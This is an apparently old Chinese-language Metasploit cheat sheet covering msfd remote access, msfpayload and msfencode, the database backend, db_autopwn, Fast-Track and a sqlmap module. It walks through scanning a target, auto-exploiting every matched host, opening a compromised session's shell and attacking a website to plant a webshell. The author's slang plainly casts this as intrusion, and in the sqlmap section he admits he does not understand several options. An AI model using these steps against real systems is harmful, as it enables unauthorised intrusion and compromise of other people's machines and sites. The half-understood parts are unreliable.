0xx1 msfd interface
--------------
//msfd 是一个打开网络网络接口的工具,可以让一个或多个用户远程连接到msf安装机器上远程使用msf
例子
1.打开端口的命令
# msfd -a <msf安装机器IP> -P <port>
2.查看是否打开端口
# netstat -tnl
3.远程连接MSF
# nc <ip> <port>
4.结束打开的端口
# kill -9 <端口进程ID>
----------------
0xx2 msfpayload && msfencode
-----------------
//msfpayload
该接口可以让我们修改现有的msfpayload
-S 显示具体星系
-C 用c语言搞它
-P 用perl语言搞它
-R 可以弄成RAW文件
//msfencode
可以直接访问payload编码器的框架
-l 列出可以用编码器
-h 帮助
例子
# msfpayload payload_name cmd=dir P 用Perl输出这个payload编码
# msfpayload -l 列出我们可以用的编码器
# msfpayload payload_name cmd=dir R | msfencode -b '0x00' -e 编码器名字 P
------------
0xx3 database backend commands //数据库后台命令
------------
支持sqlite3,mysql,postgresql.支持加载amap,nmap,nessus扫描报告自动测试
例子
msf > db_driver
[*] Active Driver: sqlite3 默认的设置
[*] Available: sqlite3 当前支持那些数据库
//如果你还要用其他几种数据库,按照下面的提示来操作吧
[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev
[*] DB Support: Enable the postgresql driver with the following command:
[*] * This requires libpq-dev and a build environment
[*] $ gem install pg
msf > db_driver mysql //这个命令是把默认数据库修改为mysql
msf > db_create hcntex //此命令是创建一个名字为Hcntex的SQLite3的数据库
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: hcntex
msf > help //这是让数据库支持更多的命令展示在你的视线里
Database Backend Commands
=========================
Command Description
------- -----------
db_add_host 添加一个或者多个目标主机
db_add_note 添加注释
db_add_port 添加端口
db_autopwn 自动漏洞利用
db_connect 连接数据库
db_create 创建数据库
db_del_host 删除添加的目标
db_del_port 删除添加的端口
db_destroy 删除建立的数据库
db_disconnect 断开数据库连接
db_driver 匹配数据库驱动
db_hosts 列出你添加的全部目标主机
db_import 列出你添加的全部目标主机的端口
db_import_amap_mlog 导入一个AMAP的扫描文件(-o -M)
db_import_ip_list 导入一个你要测试的IP段
db_import_nessus_nbe 导入一个nessus的扫描结果(nbe)
db_import_nessus_xml 同上(xml)
db_import_nmap_xml 同上(xml)
db_import_qualys_xml 同上(xml)
db_nmap 执行nmap并记录输出
db_notes 显示你在添加的注释
db_services 显示所有服务
db_vulns 列数数据库中的所有漏洞
db_workspace 转换工作区域
msf > db_disconnect //这个命令是断开和你创建的数据库连接
msf > db_connect hcntex //再次连接到这个数据库[*] Successfully connected to the database
[*] File: hcntex
msf > db_destroy hcntex //删除这个数据库
[*] Deleting hcntex...
数据库漏洞利用例子
msf > db_autopwn -h //自动利用的参数
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
msf > db_connect hcntex //连接到创建的数据库
msf > help //查看是否连接成功。看是否有数据库后台操作命令判断
msf > db_nmap -参数 攻击ip //用namp扫描你的攻击目标。前提是你的电脑安装了Nmap <-参数是Nmap的扫描参数>
msf > db_autopwn -p -e -b //基于端口自动绑定攻击开始呗。具体参数参考db_autopwn -h
msf > sessions -l //列出已经被你日了的电脑会话
msf > sessions -i <会话编号> //连接你的这个会话
meterpreter> shell //注意最前面哦。这就是打开门让你进去的东西喽
------------------
0xx4 Fast-Track autopwn //快捷创建数据库攻击
------------------
渗透平台BT4
# cd /pentest/exploits/fasttrack/
# ./fast-track.py -c
# ./fast-track.py -c <参数> <目标IP> -r
---------------------
0xx5 Meterpreter payload //隐藏自己。增加反取证的难度的东西呗
---------------------
# Meterpreter payload 可以参考 www.milsec.net 里面的embed a Metasploit Payload in any
executable 这个文章哦
-----------
0xx6 Auxiliary sqlmap && Fast-Track sqlpwnage //注入模块的东东
-----------
# locate sqlmap.py //获取sqlmap.py的路径
# ./msfconsole //启动那个啥呢?
msf>use auxiliary/scanner/http/sqlmap //启动这扫描的东东
msf>show options //看穿内裤了没有的命令
msf>set RHOSTS <URL> //设置你要日的网站。URL=什么呢?
msf>set PATH shell.php //他们管这个叫webshell
msf>set QURTY id=999999 //这个我不知道是啥。按照这个来就可以。知道的兄弟教教我!
msf>set sqlMAP_path <刚刚locat sqlmap.py的路径> //设置的扫描模块的变量
msf>set THREADS 100 //难道是设置传说中的线程?
msf>set OPTS '--dbs --current-user' //实话是我没看懂。懂的前辈指点一下。谢谢
msf>exploit //开始日喽。咱喝点咖啡在回来验收。中间的数据得自己留意哦!
--Fast-Track sqlpwnage //这个例子和上面差不多。只是速度要快点
# locate fast-track.py
# cd 到fast-track.py目录下
# ./fast-track.py -i
# 接下来就看各位看客大叔们自己按照help表演喽